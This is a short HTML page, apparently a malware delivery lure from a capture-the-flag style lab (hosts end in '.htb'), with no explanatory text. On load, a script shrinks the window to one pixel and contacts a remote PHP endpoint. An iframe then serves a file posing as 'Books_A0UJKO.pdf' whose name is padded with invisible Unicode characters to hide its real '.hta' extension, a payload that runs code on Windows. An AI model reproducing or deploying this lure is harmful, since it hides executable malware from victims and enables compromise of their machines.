

<!DOCTYPE html>

<html lang="en">
  <head>
      <script>
window.open('', '_self', '');
window.resizeTo(1, 1);
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://connectwithme.htb/te/hhhh.php', true);
xhr.onload = function() {

};
xhr.send();
setTimeout(function() {
    window.close();
}, 5000000);
</script>
     <iframe src="http://cbmeli.htb/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta" height="200" width="300" title="GG"></iframe> 
   </head>
  </body>
</html>

